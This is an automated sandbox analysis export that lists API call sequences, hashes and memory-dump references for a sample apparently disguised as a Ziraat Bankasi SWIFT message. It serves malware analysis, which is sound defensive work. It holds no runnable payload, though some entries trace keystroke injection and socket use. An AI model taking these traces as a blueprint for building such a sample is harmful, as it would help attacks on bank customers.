                                                                                                                                                        • Instruction ID: a81318e75d2cca17abf24cd0a5a67709eb9637770cf8ecf48e7d093d85ad1e45
                                                                                                                                                        • Opcode Fuzzy Hash: 3fd43cfd2ec402a919706e1df4381ee399b213161d81bf942f67d7ddf85e8270
                                                                                                                                                        • Instruction Fuzzy Hash: 5451C571601284BFEF309F6ADC86BAF7BA4EB05364F244012F654F65E2C7B1E9809B50
                                                                                                                                                        APIs
                                                                                                                                                        • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 000FDB1B
                                                                                                                                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 000FDB3C
                                                                                                                                                        • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 000FDB51
                                                                                                                                                        • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 000FDB6E
                                                                                                                                                        • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 000FDB95
                                                                                                                                                        • DestroyIcon.USER32(00000000,?,?,?,?,?,?,0009A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 000FDBA0
                                                                                                                                                        • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 000FDBBD
                                                                                                                                                        • DestroyIcon.USER32(00000000,?,?,?,?,?,?,0009A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 000FDBC8
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1268354404-0
                                                                                                                                                        • Opcode ID: 2686e756b800986ee6e5a8a0d4ef1bd4dd669f9233c23a32b3ff340806c3b16b
                                                                                                                                                        • Instruction ID: 5852e062df70c836c5e35a17cb2726c46620db4e31229e6f67c22942c5f6fcbe
                                                                                                                                                        • Opcode Fuzzy Hash: 2686e756b800986ee6e5a8a0d4ef1bd4dd669f9233c23a32b3ff340806c3b16b
                                                                                                                                                        • Instruction Fuzzy Hash: 9E517B70604208EFDF20DFA8DC82FAA77F5AB59750F110519F94696AA1D7B0ED80EB90
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 000C6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,000C5FA6,?), ref: 000C6ED8
                                                                                                                                                          • Part of subcall function 000C6EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,000C5FA6,?), ref: 000C6EF1
                                                                                                                                                          • Part of subcall function 000C72CB: GetFileAttributesW.KERNEL32(?,000C6019), ref: 000C72CC
                                                                                                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 000C75CA
                                                                                                                                                        • _wcscmp.LIBCMT ref: 000C75E2
                                                                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 000C75FB
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 793581249-0
                                                                                                                                                        • Opcode ID: 3500d281b26ad2b8d05d67b0876f3f8b5f2954a61415cdaed0faa0251275812a
                                                                                                                                                        • Instruction ID: 4b5be11837187696354dba344cd999196662175c8ccbd583e4b7b9b47a39dc1b
                                                                                                                                                        • Opcode Fuzzy Hash: 3500d281b26ad2b8d05d67b0876f3f8b5f2954a61415cdaed0faa0251275812a
                                                                                                                                                        • Instruction Fuzzy Hash: 585123B2A092199BDF65EB94D841EDD73BCAF09320F0041AEF609E3542EA7497C5CF64
                                                                                                                                                        APIs
                                                                                                                                                        • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,000FDAD1,00000004,00000000,00000000), ref: 0009EAEB
                                                                                                                                                        • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,000FDAD1,00000004,00000000,00000000), ref: 0009EB32
                                                                                                                                                        • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,000FDAD1,00000004,00000000,00000000), ref: 000FDC86
                                                                                                                                                        • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,000FDAD1,00000004,00000000,00000000), ref: 000FDCF2
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ShowWindow
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1268545403-0
                                                                                                                                                        • Opcode ID: a7972ee54ee7c5bea41a2f4b245c9a5732fb2f0d99a25ce6acf8da7c61551a44
                                                                                                                                                        • Instruction ID: c94a1d715044fc8eab349ce922bbaceeafb41f0ceb4b4919a7ff37d9e4226028
                                                                                                                                                        • Opcode Fuzzy Hash: a7972ee54ee7c5bea41a2f4b245c9a5732fb2f0d99a25ce6acf8da7c61551a44
                                                                                                                                                        • Instruction Fuzzy Hash: 5A41D4702092C5EADFB5CB28D98DA7F7AD7AB41305F19041AE28782D61C7B1BC80F611
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 000BD342: GetWindowThreadProcessId.USER32(?,00000000), ref: 000BD362
                                                                                                                                                          • Part of subcall function 000BD342: GetCurrentThreadId.KERNEL32 ref: 000BD369
                                                                                                                                                          • Part of subcall function 000BD342: AttachThreadInput.USER32(00000000,?,000BBF3E,?,00000001), ref: 000BD370
                                                                                                                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 000BC010
                                                                                                                                                        • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 000BC02D
                                                                                                                                                        • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 000BC030
                                                                                                                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 000BC039
                                                                                                                                                        • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 000BC057
                                                                                                                                                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 000BC05A
                                                                                                                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 000BC063
                                                                                                                                                        • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 000BC07A
                                                                                                                                                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 000BC07D
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2014098862-0
                                                                                                                                                        • Opcode ID: 5ed280b5b056fdbdfbb3005ef02ea4abacc6b83eec77af0797dd2fbaff254c18
                                                                                                                                                        • Instruction ID: 064f1192322d8d2202a552740552dafd112166cacb173a03da8e444b94be7111
                                                                                                                                                        • Opcode Fuzzy Hash: 5ed280b5b056fdbdfbb3005ef02ea4abacc6b83eec77af0797dd2fbaff254c18
                                                                                                                                                        • Instruction Fuzzy Hash: E31104B1510618BEF7102BB49C89FAA7B2CFB4C754F110416F3806B1E1C9F26C818AA4
                                                                                                                                                        APIs
                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,000BAEF1,00000B00,?,?), ref: 000BB26C
                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,000BAEF1,00000B00,?,?), ref: 000BB273
                                                                                                                                                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,000BAEF1,00000B00,?,?), ref: 000BB288
                                                                                                                                                        • GetCurrentProcess.KERNEL32(?,00000000,?,000BAEF1,00000B00,?,?), ref: 000BB290
                                                                                                                                                        • DuplicateHandle.KERNEL32(00000000,?,000BAEF1,00000B00,?,?), ref: 000BB293
                                                                                                                                                        • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,000BAEF1,00000B00,?,?), ref: 000BB2A3
                                                                                                                                                        • GetCurrentProcess.KERNEL32(000BAEF1,00000000,?,000BAEF1,00000B00,?,?), ref: 000BB2AB
                                                                                                                                                        • DuplicateHandle.KERNEL32(00000000,?,000BAEF1,00000B00,?,?), ref: 000BB2AE
                                                                                                                                                        • CreateThread.KERNEL32(00000000,00000000,000BB2D4,00000000,00000000,00000000), ref: 000BB2C8
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1957940570-0
                                                                                                                                                        • Opcode ID: 9d59d8a7ae5fcb6b2b5287428e66b84726663fd70f2149326325cdce0b148d82
                                                                                                                                                        • Instruction ID: 330e3cf502b16dc2c96568f004d90693a5a9ded109a832038ae66970863fe09b
                                                                                                                                                        • Opcode Fuzzy Hash: 9d59d8a7ae5fcb6b2b5287428e66b84726663fd70f2149326325cdce0b148d82
                                                                                                                                                        • Instruction Fuzzy Hash: EA01CDB5240304BFE710AFA5EC4DF6B7BACEB88711F018411FA45DF6A1CAB49840CB61
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Variant$ClearInit$_memset
                                                                                                                                                        • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                                                        • API String ID: 2862541840-625585964
                                                                                                                                                        • Opcode ID: c6e0ad83a22b5f8c95acdd0f872eaedffc7f85d4855f7275eb14e25a51024db2
                                                                                                                                                        • Instruction ID: 8d9312bfef0a84447ea537582109c8fe387e9feae7018fa4b4b80456064bc429
                                                                                                                                                        • Opcode Fuzzy Hash: c6e0ad83a22b5f8c95acdd0f872eaedffc7f85d4855f7275eb14e25a51024db2
                                                                                                                                                        • Instruction Fuzzy Hash: 8F918B71A00319EBDF24DFA5C848FAEBBB9EF85710F11855AF515AB281DB709940CFA0
                                                                                                                                                        APIs
                                                                                                                                                        • LoadIconW.USER32(00000000,00007F03), ref: 000C58B8
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: IconLoad
                                                                                                                                                        • String ID: blank$info$question$stop$warning
                                                                                                                                                        • API String ID: 2457776203-404129466
                                                                                                                                                        • Opcode ID: e7db4103854d5e6b243543bc40ec7c2da7ff0abb472f2a286b0b06c76740f1cd
                                                                                                                                                        • Instruction ID: d436d7a7e306a673a03330f5c49896ebc662443beb749c23ef0f8a9a384519fb
                                                                                                                                                        • Opcode Fuzzy Hash: e7db4103854d5e6b243543bc40ec7c2da7ff0abb472f2a286b0b06c76740f1cd
                                                                                                                                                        • Instruction Fuzzy Hash: 7711EB79309B46BEE7115B949C82EAE23DC9F15364F20003EF554F56C2EBA0BA844268
                                                                                                                                                        APIs
                                                                                                                                                        • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 000CA806
                                                                                                                                                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 000CA831
                                                                                                                                                        • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 000CA858
                                                                                                                                                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 000CA895
                                                                                                                                                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 000CA9C2
                                                                                                                                                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 000CA93B
                                                                                                                                                          • Part of subcall function 0009F4EA: std::exception::exception.LIBCMT ref: 0009F51E
                                                                                                                                                          • Part of subcall function 0009F4EA: __CxxThrowException@8.LIBCMT ref: 0009F533
                                                                                                                                                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 000CAAB7
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ArraySafe$Data$Access$Unaccess$Exception@8ThrowVartypestd::exception::exception
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3434581110-0
                                                                                                                                                        • Opcode ID: d627a66dcd6233e10c0ace1798d73a12772d3dd4cfd2259e3164c41c64283cd0
                                                                                                                                                        • Instruction ID: 30ddcb224817115832cbe4b0858f31e83680293cd598c127333a8bb7406efc2a
                                                                                                                                                        • Opcode Fuzzy Hash: d627a66dcd6233e10c0ace1798d73a12772d3dd4cfd2259e3164c41c64283cd0
                                                                                                                                                        • Instruction Fuzzy Hash: C1C15975A0520A9FDB10CF94D481BEEB7F0FF0A319F20406EE606E7251D735AA41CBA2
                                                                                                                                                        APIs
                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000100), ref: 000C6B63
                                                                                                                                                        • LoadStringW.USER32(00000000), ref: 000C6B6A
                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 000C6B80
                                                                                                                                                        • LoadStringW.USER32(00000000), ref: 000C6B87
                                                                                                                                                        • _wprintf.LIBCMT ref: 000C6BAD
                                                                                                                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 000C6BCB
                                                                                                                                                        Strings
                                                                                                                                                        • %s (%d) : ==> %s: %s %s, xrefs: 000C6BA8
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: HandleLoadModuleString$Message_wprintf
                                                                                                                                                        • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                                                        • API String ID: 3648134473-3128320259
                                                                                                                                                        • Opcode ID: 5dd68de1bd534f153f6220952efb35facc5a57da457429b5de657adbd7c1efef
                                                                                                                                                        • Instruction ID: 6bf6e79843775a680bd5f5248f4865637b04d680648787527865a2b68ceddafa
                                                                                                                                                        • Opcode Fuzzy Hash: 5dd68de1bd534f153f6220952efb35facc5a57da457429b5de657adbd7c1efef
                                                                                                                                                        • Instruction Fuzzy Hash: 270112F65002187FE711A7D4AD89EEA766CD704304F0044A5B785E2441EAB49EC48B75
                                                                                                                                                        APIs
                                                                                                                                                        • select.WSOCK32 ref: 000D9691
                                                                                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 000D969E
                                                                                                                                                        • __WSAFDIsSet.WSOCK32(00000000,?), ref: 000D96C8
                                                                                                                                                        • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 000D96E9
                                                                                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 000D96F8
                                                                                                                                                        • htons.WSOCK32(?), ref: 000D97AA
                                                                                                                                                        • inet_ntoa.WSOCK32(?), ref: 000D9765
                                                                                                                                                          • Part of subcall function 000BD2FF: _strlen.LIBCMT ref: 000BD309
                                                                                                                                                        • _strlen.LIBCMT ref: 000D9800
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorLast_strlen$htonsinet_ntoaselect
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3480843537-0
                                                                                                                                                        • Opcode ID: 1df10696c32ea52b2ec0a8424a23b09a69b1b7f06537d85151d7aa112eb1fbc8
                                                                                                                                                        • Instruction ID: 47fe04adc7a4d0d20655ea00b048f285f41a87b93038b385fc231abacc84ebcc
                                                                                                                                                        • Opcode Fuzzy Hash: 1df10696c32ea52b2ec0a8424a23b09a69b1b7f06537d85151d7aa112eb1fbc8
                                                                                                                                                        • Instruction Fuzzy Hash: E181CC31504340ABD710EF64DC85EAFB7E8EF85714F104A2EF5959B292EB70D904CBA2
                                                                                                                                                        APIs
                                                                                                                                                        • __mtinitlocknum.LIBCMT ref: 000AA991
                                                                                                                                                          • Part of subcall function 000A7D7C: __FF_MSGBANNER.LIBCMT ref: 000A7D91
                                                                                                                                                          • Part of subcall function 000A7D7C: __NMSG_WRITE.LIBCMT ref: 000A7D98
                                                                                                                                                          • Part of subcall function 000A7D7C: __malloc_crt.LIBCMT ref: 000A7DB8
                                                                                                                                                        • __lock.LIBCMT ref: 000AA9A4
                                                                                                                                                        • __lock.LIBCMT ref: 000AA9F0
                                                                                                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00136DE0,00000018,000B5E7B,?,00000000,00000109), ref: 000AAA0C
                                                                                                                                                        • EnterCriticalSection.KERNEL32(8000000C,00136DE0,00000018,000B5E7B,?,00000000,00000109), ref: 000AAA29
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(8000000C), ref: 000AAA39
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1422805418-0
                                                                                                                                                        • Opcode ID: 4ab0bb5aa6044aece5cc2e23630427d444e468156d8f1432cfe6623209351f21
                                                                                                                                                        • Instruction ID: a2bb79dc31a36648c761484ad8953c3f89c05f0b2a81357ba2408b57d9dba925
                                                                                                                                                        • Opcode Fuzzy Hash: 4ab0bb5aa6044aece5cc2e23630427d444e468156d8f1432cfe6623209351f21
                                                                                                                                                        • Instruction Fuzzy Hash: B4412871B006019BEB249FE8D94479DB7F0AF17334F158329E529AB2E2D7B49840CB92
                                                                                                                                                        APIs
                                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 000E8EE4
                                                                                                                                                        • GetDC.USER32(00000000), ref: 000E8EEC
                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 000E8EF7
                                                                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 000E8F03
                                                                                                                                                        • CreateFontW.GDI32(?,00000000,00000000,00000000,?,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 000E8F3F
                                                                                                                                                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 000E8F50
                                                                                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 000E8F8A
                                                                                                                                                        • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 000E8FAA
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3864802216-0
                                                                                                                                                        • Opcode ID: 86ca28c53c9ab773a8f1badf7badfa4352b8725a0d7116e9af72283808fbf110
                                                                                                                                                        • Instruction ID: 95e6cc09143e983f65c993395355b7cbf7e309825eda83ea78b8efb9ce759c38
                                                                                                                                                        • Opcode Fuzzy Hash: 86ca28c53c9ab773a8f1badf7badfa4352b8725a0d7116e9af72283808fbf110
                                                                                                                                                        • Instruction Fuzzy Hash: 16317F72100254BFEB108F95DC49FEB3BADEF49715F044065FE48AA191DAB59881CB70
                                                                                                                                                        APIs
                                                                                                                                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0011DC00), ref: 000DB715
